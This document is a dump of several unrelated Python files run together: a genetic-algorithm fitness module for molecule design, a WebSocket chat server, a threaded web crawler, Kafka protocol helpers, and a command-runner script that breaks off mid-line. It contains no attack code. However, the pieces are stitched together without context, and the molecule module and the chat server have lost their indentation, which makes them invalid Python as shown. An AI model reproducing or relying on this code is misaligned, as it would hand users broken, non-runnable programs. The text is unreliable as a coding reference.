def fitness(molecules_here, properties_calc_ls,
discriminator, disc_enc_type, generation_index,
max_molecules_len, device, num_processors, writer, beta, data_dir, starting_smile, desired_delta, save_curve):
''' Calculate fitness of a generation in the GA
All properties are standardized based on the mean & stddev of the zinc dataset
Parameters:
molecules_here (list) : List of molecule SMILES strings
properties_calc_ls : List of properties to calculate
discriminator (torch.Model) : Pytorch classifier
disc_enc_type (string) : Indicates the type of encoding shown to the discriminator
generation_index (int) : Index of the current generation
max_molecules_len (int) : Largest mol length
device (string) : Device of the discriminator
Returns:
fitness (np.array) : A linear combination of properties and
discriminator predictions
discriminator_predictions (np.array) : The predictions made by the discriminator
'''
if properties_calc_ls is None:
# Discriminator-only fitness is not supported in this version
raise Exception('properties_calc_ls is None; discriminator-only fitness is not supported')
else:
molecules_here_unique = list(set(molecules_here))
ratio = len(molecules_here_unique) / num_processors
chunks = evo.get_chunks(molecules_here_unique, num_processors, ratio)
chunks = [item for item in chunks if len(item) >= 1]
# Parallelize the calculation of logPs
if 'logP' in properties_calc_ls:
logP_results = create_parr_process(chunks, 'logP', starting_smile)
# Parallelize the calculation of SAS
if 'SAS' in properties_calc_ls:
SAS_results = create_parr_process(chunks, 'SAS', starting_smile)
# Parallelize the calculation of Ring Penalty
if 'RingP' in properties_calc_ls:
ringP_results = create_parr_process(chunks, 'RingP', starting_smile)
# Parallelize the calculation of SIMILR
if 'SIMILR' in properties_calc_ls:
similar_results = create_parr_process(chunks, 'SIMILR', starting_smile)
# Parallelize the calculation of USRCAT Sim #!#
if 'USRSim' in properties_calc_ls:
USRSim_results = create_parr_process(chunks, 'USRSim', starting_smile)
# Parallelize the calculation of Tanimoto #!#
if 'TaniSim' in properties_calc_ls:
TaniSim_results = create_parr_process(chunks, 'TaniSim', starting_smile)
logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, Similarity_calculated, USRSim_calculated, USRSim_norm, TaniSim_calculated, TaniSim_norm = obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, similar_results, USRSim_results, TaniSim_results)
# Add Objectives
fitness = (USRSim_norm)
# Similarity Based Fitness _________
writer.add_scalar('Mean Similarity', Similarity_calculated.mean(), generation_index) # Mean similarity
writer.add_scalar('Max Similarity', max(Similarity_calculated), generation_index) # Max similarity
Similarity_calculated = np.array([0 if x > desired_delta else -10**6 for x in Similarity_calculated])
Similarity_calculated = Similarity_calculated.reshape((fitness.shape[0], 1))
fitness = fitness + Similarity_calculated
# Plot fitness without discriminator
writer.add_scalar('max fitness without discr', max(fitness), generation_index)
save_curve.append(max(fitness))
writer.add_scalar('avg fitness without discr', fitness.mean(), generation_index)
# max fitness without discriminator
f = open('{}/max_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness without discriminator
f = open('{}/avg_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# fitness = (beta * discriminator_predictions) + fitness
# Plot fitness with discriminator
writer.add_scalar('max fitness with discrm', max(fitness), generation_index)
writer.add_scalar('avg fitness with discrm', fitness.mean(), generation_index)
# max fitness with discriminator
f = open('{}/max_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness with discriminator
f = open('{}/avg_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# Plot properties
writer.add_scalar('non standr max logp', max(logP_calculated), generation_index) # logP plots
writer.add_scalar('non standr mean logp', logP_calculated.mean(), generation_index)
writer.add_scalar('non standr min sas', min(SAS_calculated), generation_index) # SAS plots
writer.add_scalar('non standr mean sas', SAS_calculated.mean(), generation_index)
writer.add_scalar('non standr min ringp', min(RingP_calculated), generation_index) # RingP plots
writer.add_scalar('non standr mean ringp', RingP_calculated.mean(), generation_index)
writer.add_scalar('non standr max USRCAT Similarity', max(USRSim_calculated), generation_index) # USRCAT Similarity plots #!#
writer.add_scalar('non standr mean USRCAT Similarity', USRSim_calculated.mean(), generation_index)
writer.add_scalar('non standr max Tanimoto Similarity', max(TaniSim_calculated), generation_index) # Tanimoto Similarity plots #!#
writer.add_scalar('non standr mean Tanimoto Similarity', TaniSim_calculated.mean(), generation_index)
# max logP - non standardized
f = open('{}/max_logp.txt'.format(data_dir), 'a+')
f.write(str(max(logP_calculated)) + '\n')
f.close()
# mean logP - non standardized
f = open('{}/avg_logp.txt'.format(data_dir), 'a+')
f.write(str(logP_calculated.mean()) + '\n')
f.close()
# min SAS - non standardized
f = open('{}/min_SAS.txt'.format(data_dir), 'a+')
f.write(str(min(SAS_calculated)) + '\n')
f.close()
# mean SAS - non standardized
f = open('{}/avg_SAS.txt'.format(data_dir), 'a+')
f.write(str(SAS_calculated.mean()) + '\n')
f.close()
# min RingP - non standardized
f = open('{}/min_RingP.txt'.format(data_dir), 'a+')
f.write(str(min(RingP_calculated)) + '\n')
f.close()
# mean RingP - non standardized
f = open('{}/avg_RingP.txt'.format(data_dir), 'a+')
f.write(str(RingP_calculated.mean()) + '\n')
f.close()
# max USRCAT Similarity - non standardised #!#
f = open('{}/max_Similarity.txt'.format(data_dir), 'a+')
f.write(str(max(USRSim_calculated)) + '\n')
f.close()
# mean USRCAT Similarity - non standardized #!#
f = open('{}/avg_Similarity.txt'.format(data_dir), 'a+')
f.write(str(USRSim_calculated.mean()) + '\n')
f.close()
# max Tanimoto Similarity - non standardised #!#
f = open('{}/max_Tanimoto.txt'.format(data_dir), 'a+')
f.write(str(max(TaniSim_calculated)) + '\n')
f.close()
# mean Tanimoto Similarity - non standardized #!#
f = open('{}/avg_Tanimoto.txt'.format(data_dir), 'a+')
f.write(str(TaniSim_calculated.mean()) + '\n')
f.close()
return fitness, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated
def obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, similar_results, USRSim_results, TaniSim_results): #!#
''' Obtain calculated properties of molecules in molecules_here, and standardize
values base on properties of the Zinc Data set.
'''
logP_calculated = []
SAS_calculated = []
RingP_calculated = []
Similarity_calculated = []
USRSim_calculated = [] #!#
TaniSim_calculated = [] #!#
for smi in molecules_here:
logP_calculated.append(logP_results[smi])
SAS_calculated.append(SAS_results[smi])
RingP_calculated.append(ringP_results[smi])
Similarity_calculated.append(similar_results[smi])
USRSim_calculated.append(USRSim_results[smi]) #!#
TaniSim_calculated.append(TaniSim_results[smi]) #!#
logP_calculated = np.array(logP_calculated)
SAS_calculated = np.array(SAS_calculated)
RingP_calculated = np.array(RingP_calculated)
Similarity_calculated = np.array(Similarity_calculated)
USRSim_calculated = np.array(USRSim_calculated) #!#
TaniSim_calculated = np.array(TaniSim_calculated) #!#
# Standardize logP based on zinc logP (mean: 2.4729421499641497 & std : 1.4157879815362406)
logP_norm = (logP_calculated - 2.4729421499641497) / 1.4157879815362406
logP_norm = logP_norm.reshape((logP_calculated.shape[0], 1))
# Standardize SAS based on zinc SAS(mean: 3.0470797085649894 & std: 0.830643172314514)
SAS_norm = (SAS_calculated - 3.0470797085649894) / 0.830643172314514
SAS_norm = SAS_norm.reshape((SAS_calculated.shape[0], 1))
# Standardize RingP based on zinc RingP (mean: 0.038131530820234766 & std: 0.2240274735210179)
RingP_norm = (RingP_calculated - 0.038131530820234766) / 0.2240274735210179
RingP_norm = RingP_norm.reshape((RingP_calculated.shape[0], 1))
# Standardize USRCAT Similarity based on reference-set statistics (mean: 0.186428542 & std: 0.035664915) #!#
USRSim_norm = (USRSim_calculated - 0.186428542) / 0.035664915
USRSim_norm = USRSim_norm.reshape((USRSim_calculated.shape[0], 1)) #!#
# Standardize Tanimoto Similarity based on ChemBL Tanimoto Similarity(mean: 0.350252265668509 & std: 0.0681108949632873) #!#
TaniSim_norm = (TaniSim_calculated - 0.350252265668509) / 0.0681108949632873
TaniSim_norm = TaniSim_norm.reshape((TaniSim_calculated.shape[0], 1)) #!#
return logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, Similarity_calculated, USRSim_calculated, USRSim_norm, TaniSim_calculated, TaniSim_norm
def obtain_fitness(disc_enc_type, smiles_here, selfies_here, properties_calc_ls,
discriminator, generation_index, max_molecules_len, device, generation_size, num_processors, writer, beta, image_dir, data_dir, starting_smile, desired_delta, save_curve):
''' Obtain fitness of generation based on choices of disc_enc_type.
Essentially just calls 'fitness'
'''
# ANALYSE THE GENERATION #!#
if disc_enc_type == 'smiles' or disc_enc_type == 'properties_rdkit':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated = fitness(smiles_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, starting_smile, desired_delta, save_curve)
elif disc_enc_type == 'selfies':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated = fitness(selfies_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, starting_smile, desired_delta, save_curve)
fitness_here = fitness_here.reshape((generation_size, ))
order, fitness_ordered, smiles_ordered, selfies_ordered = order_based_on_fitness(fitness_here, smiles_here, selfies_here)
# Order molecules based on ordering of 'smiles_ordered'
logP_calculated = [logP_calculated[idx] for idx in order]
SAS_calculated = [SAS_calculated[idx] for idx in order]
RingP_calculated = [RingP_calculated[idx] for idx in order]
USRSim_calculated = [USRSim_calculated[idx] for idx in order] #!#
TaniSim_calculated = [TaniSim_calculated[idx] for idx in order] #!#
os.makedirs('{}/{}'.format(data_dir, generation_index))
# Write ordered smiles in a text file
f = open('{}/{}/smiles_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in smiles_ordered])
f.close()
# Write logP of ordered smiles in a text file
f = open('{}/{}/logP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in logP_calculated])
f.close()
# Write sas of ordered smiles in a text file
f = open('{}/{}/sas_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in SAS_calculated])
f.close()
# Write ringP of ordered smiles in a text file
f = open('{}/{}/ringP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in RingP_calculated])
f.close()
# Write USRCAT Similarity of ordered smiles in a text file #!#
f = open('{}/{}/USRCATSimilarity_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in USRSim_calculated])
f.close()
# Write Tanimoto Similarity of ordered smiles in a text file #!#
f = open('{}/{}/Tanimoto_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in TaniSim_calculated])
f.close()
#print statement for the best molecule in the generation
print('Best molecule in generation ', generation_index)
print(' smile : ', smiles_ordered[0])
print(' fitness: ', fitness_ordered[0])
print(' logP : ', logP_calculated[0])
print(' sas : ', SAS_calculated[0])
print(' ringP : ', RingP_calculated[0])
print(' USRCAT : ', USRSim_calculated[0]) #!#
print(' Tanimoto : ', TaniSim_calculated[0]) #!# #!# --> Another Similarity change to the right and two lines down |
#!# V
f = open('{}/best_in_generations.txt'.format(data_dir), 'a+')
best_gen_str = 'index: {}, smile: {}, fitness: {}, logP: {}, sas: {}, ringP: {}, USRCAT: {}, Tanimoto: {}'.format(generation_index, smiles_ordered[0], fitness_ordered[0], logP_calculated[0], SAS_calculated[0], RingP_calculated[0], USRSim_calculated[0], TaniSim_calculated[0])
f.write(best_gen_str + '\n')
f.close()
#!# -->
show_generation_image(generation_index, image_dir, smiles_ordered, fitness_ordered, logP_calculated, SAS_calculated, RingP_calculated, USRSim_calculated, TaniSim_calculated)
return fitness_here, order, fitness_ordered, smiles_ordered, selfies_ordered
def show_generation_image(generation_index, image_dir, smiles_ordered, fitness, logP, SAS, RingCount, USRSim, TaniSim): #!#
''' Plot the 100 molecules with the best fitness in a generation
Called at the end of each generation. The image for each generation
is stored with name 'generation_index.png'
Images are stored in directory './images'
'''
if generation_index > 1:
A = list(smiles_ordered)
A = A[:100]
if len(A) < 100 : return #raise Exception('Not enough molecules provided for plotting ', len(A))
A = [Chem.MolFromSmiles(x) for x in A]
evo.create_100_mol_image(A, "./{}/{}_ga.png".format(image_dir, generation_index), fitness, logP, SAS, RingCount, USRSim, TaniSim) #!#
def obtain_previous_gen_mol(starting_smiles, starting_selfies, generation_size,
generation_index, selfies_all, smiles_all):
'''Obtain molecules from one generation prior.
If generation_index is 1, only the starting molecules are returned
Parameters:
Returns:
'''
# Obtain molecules from the previous generation
if generation_index == 1:
randomized_smiles = []
randomized_selfies = []
for i in range(generation_size): # nothing to obtain from previous gen
# So, choose random molecules from the starting list
index = randrange(len(starting_smiles))
randomized_smiles.append(starting_smiles[index])
randomized_selfies.append(starting_selfies[index])
return randomized_smiles, randomized_selfies
else:
return smiles_all[generation_index-2], selfies_all[generation_index-2]
def order_based_on_fitness(fitness_here, smiles_here, selfies_here):
'''Order elements of the lists (args) based on decreasing fitness
'''
order = np.argsort(fitness_here)[::-1] # Decreasing order of indices, based on fitness
fitness_ordered = [fitness_here[idx] for idx in order]
smiles_ordered = [smiles_here[idx] for idx in order]
selfies_ordered = [selfies_here[idx] for idx in order]
return order, fitness_ordered, smiles_ordered, selfies_ordered
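# Illustrative sketch (not part of the original module): ordering toy SMILES/SELFIES lists by
# a toy fitness array. The molecule strings below are placeholders, not real molecules.
def _example_order_based_on_fitness():
    toy_fitness = np.array([0.1, 0.9, 0.5])
    order, fitness_ordered, smiles_ordered, selfies_ordered = order_based_on_fitness(
        toy_fitness, ['a', 'b', 'c'], ['A', 'B', 'C'])
    return smiles_ordered  # -> ['b', 'c', 'a'] (best fitness first)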
def apply_generation_cutoff(order, generation_size):
''' Return a list of indices of molecules that are kept (high fitness)
and a list of indices of molecules that are replaced (low fitness)
The cut-off is imposed using a Fermi-Function
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
generation_size (int) : number of molecules in a generation
Returns:
to_replace (list): indices of molecules that will be replaced by random mutations of
molecules in list 'to_keep'
to_keep (list): indices of molecules that will be kept for the following generations
'''
# Get the probabilities that a molecule with a given fitness will be replaced
# a fermi function is used to smoothen the transition
positions = np.array(range(0, len(order))) - 0.2*float(len(order))
probabilities = 1.0 / (1.0 + np.exp(-0.02 * generation_size * positions / float(len(order))))
to_replace = [] # all molecules that are replaced
to_keep = [] # all molecules that are kept
for idx in range(0,len(order)):
if np.random.rand(1) < probabilities[idx]:
to_replace.append(idx)
else:
to_keep.append(idx)
return to_replace, to_keep
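# Illustrative sketch (not part of the original module): the replacement probability above
# follows a logistic (Fermi) curve centred at roughly the top 20% of the ranking. With
# generation_size == len(order) == 500, the top-ranked molecule is replaced with probability
# of only about 0.12, while the lowest-ranked one is replaced almost surely.
def _example_cutoff_probabilities(generation_size=500):
    order = list(range(generation_size))
    positions = np.array(range(0, len(order))) - 0.2 * float(len(order))
    probabilities = 1.0 / (1.0 + np.exp(-0.02 * generation_size * positions / float(len(order))))
    return probabilities[0], probabilities[-1]  # ~0.12 and ~1.0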
def obtain_next_gen_molecules(order, to_replace, to_keep,
selfies_ordered, smiles_ordered, max_molecules_len):
''' Obtain the next generation of molecules. Bad molecules are replaced by
mutations of good molecules
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
to_replace (list) : list of indices of molecules to be replaced by random mutations of better molecules
to_keep (list) : list of indices of molecules to be kept in following generation
selfies_ordered (list) : list of SELFIE molecules, ordered by fitness
smiles_ordered (list) : list of SMILE molecules, ordered by fitness
max_molecules_len (int) : length of largest molecule
Returns:
smiles_mutated (list): next generation of mutated molecules as SMILES
selfies_mutated(list): next generation of mutated molecules as SELFIES
'''
smiles_mutated = []
selfies_mutated = []
for idx in range(0,len(order)):
if idx in to_replace: # smiles to replace (by better molecules)
random_index=np.random.choice(to_keep, size=1, replace=True, p=None)[0] # select a random molecule that survived
grin_new, smiles_new = evo.mutations_random_grin(selfies_ordered[random_index], max_molecules_len) # do the mutation
# add mutated molecule to the population
smiles_mutated.append(smiles_new)
selfies_mutated.append(grin_new)
else: # smiles to keep
smiles_mutated.append(smiles_ordered[idx])
selfies_mutated.append(selfies_ordered[idx])
return smiles_mutated, selfies_mutated
def update_gen_res(smiles_all, smiles_mutated, selfies_all, selfies_mutated, smiles_all_counter):
'''Collect results that will be shared with global variables outside generations
'''
smiles_all.append(smiles_mutated)
selfies_all.append(selfies_mutated)
for smi in smiles_mutated:
if smi in smiles_all_counter:
smiles_all_counter[smi] += 1
else:
smiles_all_counter[smi] = 1
return smiles_all, selfies_all, smiles_all_counter
|
talktalktalk.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# TalkTalkTalk
#
# is an easy-installable small chat room, with chat history.
#
# author: Joseph Ernest (twitter: @JosephErnest)
# url: http://github.com/josephernest/talktalktalk
# license: MIT license
import sys, json, bleach, time, threading, dumbdbm, random, re
import daemon
from bottle import route, run, view, request, post, ServerAdapter, get, static_file
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.exceptions import WebSocketError
from collections import deque
from config import PORT, HOST, ADMINNAME, ADMINHIDDENNAME, ALLOWEDTAGS
idx = 0
def websocket(callback):
def wrapper(*args, **kwargs):
callback(request.environ.get('wsgi.websocket'), *args, **kwargs)
return wrapper
class GeventWebSocketServer(ServerAdapter):
def run(self, handler):
server = pywsgi.WSGIServer((self.host, self.port), handler, handler_class=WebSocketHandler)
server.serve_forever()
def main():
global idx
db = dumbdbm.open('talktalktalk.db', 'c')
idx = len(db)
users = {}
pings = {}
usermessagetimes = {}
def send_userlist():
for u in users.keys():
if not u.closed:
u.send(json.dumps({'type' : 'userlist', 'connected': users.values()}))
def clean_username(usr, ws):
username = bleach.clean(usr, tags=ALLOWEDTAGS, strip=True)
#username = re.sub('[ :]', '', username) # removes " ", ":", and the evil char "" http://unicode-table.com/fr/200D/
username = re.sub(r'\W+', '', username) # because of spam and usage of malicious utf8 characters, let's use alphanumeric usernames only for now
username = username[:16]
if username.lower() == ADMINNAME or username == '':
username = 'user' + str(random.randint(0, 1000))
ws.send(json.dumps({'type' : 'usernameunavailable', 'username' : username}))
elif username.lower() == ADMINHIDDENNAME:
username = ADMINNAME
ws.send(json.dumps({'type' : 'displayeduser', 'username' : username}))
return username
def dbworker(): # when a user disappears during more than 30 seconds (+/- 10), remove him/her from the userlist
while True:
userlistchanged = False
t = time.time()
for ws in users.copy():
if t - pings[ws] > 30:
del users[ws]
del pings[ws]
userlistchanged = True
if userlistchanged:
send_userlist()
time.sleep(10)
dbworkerThread = threading.Thread(target=dbworker)
dbworkerThread.daemon = True
dbworkerThread.start()
@get('/ws', apply=[websocket])
def chat(ws):
global idx
usermessagetimes[ws] = deque(maxlen=10)
while True:
try:
receivedmsg = ws.receive()
if receivedmsg is not None:
receivedmsg = receivedmsg.decode('utf8')
if len(receivedmsg) > 4096: # this user is probably a spammer
ws.send(json.dumps({'type' : 'flood'}))
break
pings[ws] = time.time()
if receivedmsg == 'ping': # ping/pong packet to make sure connection is still alive
ws.send('id' + str(idx-1)) # send the latest message id in return
if ws not in users: # was deleted by dbworker
ws.send(json.dumps({'type' : 'username'}))
else:
usermessagetimes[ws].append(time.time()) # flood control
if len(usermessagetimes[ws]) == usermessagetimes[ws].maxlen:
if usermessagetimes[ws][-1] - usermessagetimes[ws][0] < 5: # if more than 10 messages in 5 seconds (including ping messages)
ws.send(json.dumps({'type' : 'flood'})) # disconnect the spammer
break
msg = json.loads(receivedmsg)
if msg['type'] == 'message':
message = (bleach.clean(msg['message'], tags=ALLOWEDTAGS, strip=True)).strip()
if ws not in users: # is this really mandatory ?
username = clean_username(msg['username'], ws)
users[ws] = username
send_userlist()
if message:
if len(message) > 1000:
message = message[:1000] + '...'
s = json.dumps({'type' : 'message', 'message': message, 'username': users[ws], 'id': idx, 'datetime': int(time.time())})
db[str(idx)] = s # Neither dumbdbm nor shelve module allow integer as key... I'm still looking for a better solution!
idx += 1
for u in users.keys():
u.send(s)
elif msg['type'] == 'messagesbefore':
idbefore = msg['id']
ws.send(json.dumps({'type' : 'messages', 'before': 1, 'messages': [db[str(i)] for i in range(max(0,idbefore - 100),idbefore)]}))
elif msg['type'] == 'messagesafter':
idafter = msg['id']
ws.send(json.dumps({'type' : 'messages', 'before': 0, 'messages': [db[str(i)] for i in range(idafter,idx)]}))
elif msg['type'] == 'username':
username = clean_username(msg['username'], ws)
if ws not in users: # welcome new user
ws.send(json.dumps({'type' : 'messages', 'before': 0, 'messages': [db[str(i)] for i in range(max(0,idx - 100),idx)]}))
users[ws] = username
send_userlist()
else:
break
except (WebSocketError, ValueError, UnicodeDecodeError): # ValueError happens for example when "No JSON object could be decoded", would be interesting to log it
break
if ws in users:
del users[ws]
del pings[ws]
send_userlist()
@route('/')
@route('/index.html')
@view('talktalktalk.html')
def index():
context = {'request': request}
return (context)
@route('/popsound.mp3')
def popsound():
return static_file('popsound.mp3', root='.')
run(host=HOST, port=PORT, debug=True, server=GeventWebSocketServer)
class talktalktalk(daemon.Daemon):
def run(self):
main()
if len(sys.argv) == 1: # command line interactive mode
main()
elif len(sys.argv) == 2: # daemon mode
daemon = talktalktalk(pidfile='_.pid', stdout='log.txt', stderr='log.txt')
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
|
main.py
|
import threading
from queue import Queue
from spider import Spider
from domain import *
from code import *
PROJECT_NAME = input('What is the project_name? >>')
HOMEPAGE = input("What's the website url? >>")
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 8
queue = Queue()
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
#do the next job in the queue
def work():
while True:
url = queue.get()
Spider.crawl_page(threading.current_thread().name,url)
queue.task_done()
def create_jobs():
for link in file_to_set(QUEUE_FILE):
queue.put(link)
queue.join()
crawl()
#crawl the items in queue
def crawl():
queued_links = file_to_set(QUEUE_FILE)
if len(queued_links) > 0 :
print(str(len(queued_links)) + ' in the queue')
create_jobs()
create_workers()
crawl()
|
util.py
|
from __future__ import absolute_import
import atexit
import binascii
import collections
import struct
from threading import Thread, Event
import weakref
from kafka.vendor import six
from kafka.errors import BufferUnderflowError
def crc32(data):
crc = binascii.crc32(data)
# py2 and py3 behave a little differently
# CRC is encoded as a signed int in kafka protocol
# so we'll convert the py3 unsigned result to signed
if six.PY3 and crc >= 2**31:
crc -= 2**32
return crc
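# Minimal check (illustrative, not part of the original module): the fold above keeps the CRC
# inside the signed 32-bit range that the Kafka protocol expects, on both py2 and py3.
def _example_signed_crc32():
    value = crc32(b'example payload')
    assert -2**31 <= value < 2**31
    return value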
def write_int_string(s):
if s is not None and not isinstance(s, six.binary_type):
raise TypeError('Expected "%s" to be bytes\n'
'data=%s' % (type(s), repr(s)))
if s is None:
return struct.pack('>i', -1)
else:
return struct.pack('>i%ds' % len(s), len(s), s)
def read_short_string(data, cur):
if len(data) < cur + 2:
raise BufferUnderflowError("Not enough data left")
(strlen,) = struct.unpack('>h', data[cur:cur + 2])
if strlen == -1:
return None, cur + 2
cur += 2
if len(data) < cur + strlen:
raise BufferUnderflowError("Not enough data left")
out = data[cur:cur + strlen]
return out, cur + strlen
def relative_unpack(fmt, data, cur):
size = struct.calcsize(fmt)
if len(data) < cur + size:
raise BufferUnderflowError("Not enough data left")
out = struct.unpack(fmt, data[cur:cur + size])
return out, cur + size
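# Illustrative sketch (not part of the original module): reading a big-endian int32 followed by
# an int16 from a buffer while advancing the cursor, as the protocol parsing helpers above do.
def _example_relative_unpack():
    data = struct.pack('>ih', 7, 3)
    (first,), cur = relative_unpack('>i', data, 0)
    (second,), cur = relative_unpack('>h', data, cur)
    return first, second, cur  # -> (7, 3, 6)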
def group_by_topic_and_partition(tuples):
out = collections.defaultdict(dict)
for t in tuples:
assert t.topic not in out or t.partition not in out[t.topic], \
'Duplicate {0}s for {1} {2}'.format(t.__class__.__name__,
t.topic, t.partition)
out[t.topic][t.partition] = t
return out
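# Illustrative sketch (not part of the original module): the helper above only needs objects
# with `topic` and `partition` attributes; a throwaway namedtuple stands in for the real
# protocol payload tuples here.
def _example_group_by_topic_and_partition():
    FakePayload = collections.namedtuple('FakePayload', ['topic', 'partition'])
    payloads = [FakePayload('events', 0), FakePayload('events', 1)]
    grouped = group_by_topic_and_partition(payloads)
    return grouped['events'][1]  # -> FakePayload(topic='events', partition=1)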
class ReentrantTimer(object):
"""
A timer that can be restarted, unlike threading.Timer
(although this uses threading.Timer)
Arguments:
t: timer interval in milliseconds
fn: a callable to invoke
args: tuple of args to be passed to function
kwargs: keyword arguments to be passed to function
"""
def __init__(self, t, fn, *args, **kwargs):
if t <= 0:
raise ValueError('Invalid timeout value')
if not callable(fn):
raise ValueError('fn must be callable')
self.thread = None
self.t = t / 1000.0
self.fn = fn
self.args = args
self.kwargs = kwargs
self.active = None
def _timer(self, active):
# python2.6 Event.wait() always returns None
# python2.7 and greater returns the flag value (true/false)
# we want the flag value, so add an 'or' here for python2.6
# this is redundant for later python versions (FLAG OR FLAG == FLAG)
while not (active.wait(self.t) or active.is_set()):
self.fn(*self.args, **self.kwargs)
def start(self):
if self.thread is not None:
self.stop()
self.active = Event()
self.thread = Thread(target=self._timer, args=(self.active,))
self.thread.daemon = True # So the app exits when main thread exits
self.thread.start()
def stop(self):
if self.thread is None:
return
self.active.set()
self.thread.join(self.t + 1)
# noinspection PyAttributeOutsideInit
self.timer = None
self.fn = None
def __del__(self):
self.stop()
class WeakMethod(object):
"""
Callable that weakly references a method and the object it is bound to. It
is based on http://stackoverflow.com/a/24287465.
Arguments:
object_dot_method: A bound instance method (i.e. 'object.method').
"""
def __init__(self, object_dot_method):
try:
self.target = weakref.ref(object_dot_method.__self__)
except AttributeError:
self.target = weakref.ref(object_dot_method.im_self)
self._target_id = id(self.target())
try:
self.method = weakref.ref(object_dot_method.__func__)
except AttributeError:
self.method = weakref.ref(object_dot_method.im_func)
self._method_id = id(self.method())
def __call__(self, *args, **kwargs):
"""
Calls the method on target with args and kwargs.
"""
return self.method()(self.target(), *args, **kwargs)
def __hash__(self):
return hash(self.target) ^ hash(self.method)
def __eq__(self, other):
if not isinstance(other, WeakMethod):
return False
return self._target_id == other._target_id and self._method_id == other._method_id
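# Illustrative sketch (not part of the original module): a WeakMethod does not keep the bound
# object alive, so a registered callback dies with its owner. _ExampleOwner is a hypothetical
# stand-in for any object registering a callback.
class _ExampleOwner(object):
    def on_event(self, payload):
        return payload

def _example_weak_method():
    owner = _ExampleOwner()
    callback = WeakMethod(owner.on_event)
    return callback('ping')  # -> 'ping' while `owner` is still strongly referenced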
def try_method_on_system_exit(obj, method, *args, **kwargs):
def wrapper(_obj, _meth, *args, **kwargs):
try:
getattr(_obj, _meth)(*args, **kwargs)
except (ReferenceError, AttributeError):
pass
atexit.register(wrapper, weakref.proxy(obj), method, *args, **kwargs)
|
shu.py
|
#!/usr/bin/env python
import argparse
import multiprocessing
import os.path
import os
import Queue
import signal
import subprocess
import sys
import time
import threading
import base64
from subprocess import Popen, PIPE, STDOUT
from collections import Counter
def readLines(file):
lines = []
for line in open(file, 'r').read().split('\n'):
if line != "":
lines.append(line)
return lines
def execute (command, timeout = -1):
start_time = time.time()
processPid = [None]
stdoutOutput = [None]
stderrOutput = [None]
def target():
process = Popen(command, stdout=PIPE, stderr=STDOUT, close_fds=True)
processPid[0] = process.pid;
(stdoutOutput[0], stderrOutput[0]) = process.communicate();
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
# Kill Process
try:
os.killpg(processPid[0], signal.SIGKILL)
except:
pass
os.waitpid(-1, os.WNOHANG)
thread.join()
elapsed_time = time.time() - start_time
output = stdoutOutput[0]
return (output.strip(), elapsed_time);
def execute2(cmd, timeout=None):
'''
Will execute a command, read the output and return it back.
@param cmd: command to execute
@param timeout: process timeout in seconds
@return: a tuple of (stdout output, elapsed seconds), or None if the timeout was reached
@raise OSError: on missing command
'''
ph_out = None # process output
ph_err = None # stderr
ph_ret = None # return code
start_time = time.time()
def preexec_function():
# Ignore the SIGINT signal by setting the handler to the standard
# signal handler SIG_IGN.
signal.signal(signal.SIGINT, signal.SIG_IGN)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=True,
preexec_fn = preexec_function)
# if timeout is not set wait for process to complete
if not timeout:
ph_ret = p.wait()
else:
fin_time = time.time() + timeout
while p.poll() == None and fin_time > time.time():
time.sleep(0.001)
# if timeout reached, raise an exception
if fin_time < time.time():
# starting 2.6 subprocess has a kill() method which is preferable
# p.kill()
try:
os.kill(p.pid, signal.SIGKILL)
except:
pass
return None
ph_ret = p.returncode
ph_out, ph_err = p.communicate()
return (ph_out, time.time() - start_time)
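# Illustrative usage sketch (not part of the original script): both helpers above return the
# captured output together with the elapsed time; execute2 additionally returns None when the
# timeout is hit. The command below is only a placeholder.
def exampleExecute2():
    result = execute2(["echo", "hello"], timeout=5)
    if result is not None:
        output, elapsed = result
        print("%s (%.3fs)" % (output.strip(), elapsed))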
class Base:
asc = None
avm = None
builtin_abc = None
def __init__(self):
self.setEnvironmentVariables();
pass
def setEnvironmentVariables(self):
if 'ASC' in os.environ:
self.asc = os.environ['ASC'].strip();
else:
print "Environment variable ASC is not defined, set it to asc.jar"
if 'BUILTINABC' in os.environ:
self.builtin_abc = os.environ['BUILTINABC'].strip();
else:
